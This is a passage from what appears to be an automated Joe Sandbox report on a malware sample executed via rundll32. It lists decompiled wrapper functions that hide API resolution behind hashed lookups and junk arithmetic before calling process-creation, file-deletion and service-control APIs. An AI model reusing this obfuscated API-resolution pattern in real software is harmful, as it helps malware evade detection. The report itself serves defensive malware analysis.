				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002807A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00271006
0x00271009
0x0027100c
0x00271011
0x00271016
0x0027101d
0x00271026
0x0027102d
0x00271034
0x0027103b
0x00271047
0x0027104f
0x00271057
0x0027105e
0x00271065
0x0027106c
0x00271073
0x00271077
0x0027108b
0x00271096
0x0027109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00271096

Strings

[, xrefs: 0027103B

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: cb5d1f7e7c77c56ae6f7c60883998667d5e1ccb51de3edb52ae8abe7d7fdd84a
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: F7015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B689B91

Uniqueness

Uniqueness Score: -1.00%

Function 00274859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00274859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002807A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0027485e
0x0027487a
0x0027487d
0x00274884
0x0027488b
0x00274892
0x0027489d
0x002748a0
0x002748ad
0x002748b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002748B7

Strings

[, xrefs: 0027488B

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 29cc95b77f91dd26d4372fbf7ca8f9429afc5be4d3e0f6f1ef3b1c709b7f5037
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 83F017B0A15209FBDB44CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F549B50

Uniqueness

Uniqueness Score: -1.00%

Function 00284F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00284F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002807A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00284f80
0x00284f81
0x00284f82
0x00284f86
0x00284f87
0x00284f8c
0x00284fa5
0x00284fa8
0x00284faf
0x00284fb6
0x00284fc7
0x00284fca
0x00284fd7
0x00284fe2
0x00284fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00284FE2

Strings

{#lm, xrefs: 00284FC2

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 81d8b0cbe170351add54bc97a8067ea70379330acb0679ff67c19b6f1c515823
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: F2F037B081220CFFDB04EFA4D98689EBFBAEB44300F208199E808AB250D3715B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 0028976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0028976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0027602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002807A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00289772
0x00289773
0x00289778
0x0028977a
0x0028977b
0x0028977e
0x0028977f
0x00289782
0x00289785
0x00289788
0x00289789
0x0028978c
0x0028978f
0x00289790
0x00289791
0x00289794
0x00289797
0x0028979a
0x0028979d
0x002897a0
0x002897a3
0x002897a6
0x002897a7
0x002897a8
0x002897ad
0x002897b7
0x002897c3
0x002897ca
0x002897d1
0x002897d8
0x002897df
0x002897e3
0x002897fc
0x00289816
0x0028981d

APIs

CreateProcessW.KERNEL32(0027591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0027591A), ref: 00289816

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 71d372d6eeb36552ba429c1e51a1e5a4d21d2ea10996de98c2c02c4b4e0f3351
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: B511B372911148BFDF599F96DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0027B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0027B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0027602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002807A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0027b569
0x0027b56a
0x0027b56d
0x0027b572
0x0027b574
0x0027b577
0x0027b57a
0x0027b57d
0x0027b580
0x0027b583
0x0027b586
0x0027b587
0x0027b58a
0x0027b58d
0x0027b590
0x0027b593
0x0027b594
0x0027b595
0x0027b59a
0x0027b5a4
0x0027b5b8
0x0027b5c0
0x0027b5c4
0x0027b5cb
0x0027b5d2
0x0027b5d9
0x0027b5e6
0x0027b5fd
0x0027b604

APIs

CreateFileW.KERNELBASE(00280668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00280668,?,?,?,?), ref: 0027B5FD

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 6a5fb35de188177de2f78cb3aff3be9eb9857be4b73b987a09397710c5cca1f6
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 5211B272801248BBDF56DF95DD06CEE7F7AFF89314F148198FA1862160D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0028981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0028981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0027602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002807A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00289821
0x00289822
0x00289825
0x00289828
0x0028982a
0x0028982c
0x0028982f
0x00289832
0x00289835
0x00289836
0x00289837
0x0028983c
0x00289855
0x00289858
0x0028985f
0x00289866
0x0028986d
0x00289874
0x0028987b
0x0028988e
0x0028989b
0x002898a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002787F2,0000CAAE,0000510C,AD82F196), ref: 0028989B

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 48b4110e36b1443f9121bbed435ee8175c118321d8aafb5fc0ad7413a4ade397
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 7D019A76801208FBDB04EFD5DC46CDFBF79EF85310F108188F908A6220E6715B219BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00287BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00287BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002807A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00287bf7
0x00287bf8
0x00287bfa
0x00287bfd
0x00287bff
0x00287c02
0x00287c06
0x00287c07
0x00287c0f
0x00287c1d
0x00287c25
0x00287c2d
0x00287c31
0x00287c38
0x00287c3f
0x00287c46
0x00287c4a
0x00287c5e
0x00287c67
0x00287c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00287C67

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: c88058e3f956a201e62ac8fefa26631285943e80a9dd8f5ce2b7d9d9758d511d
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 56014FB190120CFFEB09DF94C84A8DEBBB5EF44314F108198F40567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0027F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0027F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002807A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0027f662
0x0027f663
0x0027f665
0x0027f668
0x0027f66a
0x0027f66d
0x0027f670
0x0027f673
0x0027f677
0x0027f678
0x0027f67d
0x0027f687
0x0027f693
0x0027f69a
0x0027f6a1
0x0027f6a5
0x0027f6a9
0x0027f6b0
0x0027f6c9
0x0027f6d8
0x0027f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0027F6D8

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 4a315a5291038ea88c2fb2798cf444c4ab9c44c8d5ed0b15817a42d35b9cb1eb
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: CB01E5B6901208BFEF05AF94DC4A8DF7F75EB05324F148188F90462250D6B25E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0027B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0027B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0027602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002807A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0027b6f3
0x0027b6f8
0x0027b702
0x0027b70b
0x0027b712
0x0027b719
0x0027b720
0x0027b727
0x0027b72e
0x0027b747
0x0027b759
0x0027b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0027B759

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 39425e63c0c223bbfd320331d13a9d3338563cc64aed30bfe319847f9b174ec7
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 120178B6941308FBEB45DF90DD06A9E7BB5EB08704F108188FA09261A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0028AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0028AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002807A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0028aa3f
0x0028aa40
0x0028aa41
0x0028aa44
0x0028aa47
0x0028aa4b
0x0028aa4c
0x0028aa51
0x0028aa5b
0x0028aa64
0x0028aa68
0x0028aa6f
0x0028aa76
0x0028aa8d
0x0028aa90
0x0028aa9d
0x0028aaa8
0x0028aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0028AAA8

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: de235b87c96ac636f0eef76f87fa29bbb056d4babdaad4044c6ed165612fae49
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 8CF069B591020CFFDF08EF94DD4A89EBFB4EB44304F108088F805A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00275FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00275FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002807A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00275fb5
0x00275fb6
0x00275fb7
0x00275fbb
0x00275fbc
0x00275fc1
0x00275fcb
0x00275fd7
0x00275fde
0x00275fe5
0x00275ffc
0x00275fff
0x00276006
0x0027600d
0x0027601a
0x00276025
0x0027602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00276025

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 46e8d10550a73657c38d30a72f43b91e223ea195f7de58e536ff4085b5ab4dbd
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: BFF04FB4C11208FFDB48DFA0E94689EBFB8EB40300F208198E409A7260E7715F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2948 Parent PID: 2976 rundll32.exeCOMMON

Executed Functions

Function 00302959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00302959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0030602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E003107A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0030295f
0x00302964
0x00302967
0x0030296a
0x0030296d
0x0030296e
0x0030296f
0x00302977
0x00302985
0x0030298a
0x00302992
0x0030299a
0x003029a2
0x003029a9
0x003029b0
0x003029b7
0x003029bb
0x003029cf
0x003029dc
0x003029e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 003029DC

Strings

<^, xrefs: 00302977

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 934b622874ff12abe223d514a8b0a5646d853a20cc8a6491f65238bcca9c6202
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: FF018072A01108BFEB18DF95DC0A8DFBFB6EF48310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0030C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0030C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0030602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E003107A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0030c6e1
0x0030c6e6
0x0030c6f0
0x0030c6fc
0x0030c703
0x0030c706
0x0030c70d
0x0030c711
0x0030c715
0x0030c71c
0x0030c723
0x0030c72a
0x0030c731
0x0030c738
0x0030c751
0x0030c762
0x0030c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0030C762

Strings

/O, xrefs: 0030C6E6

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

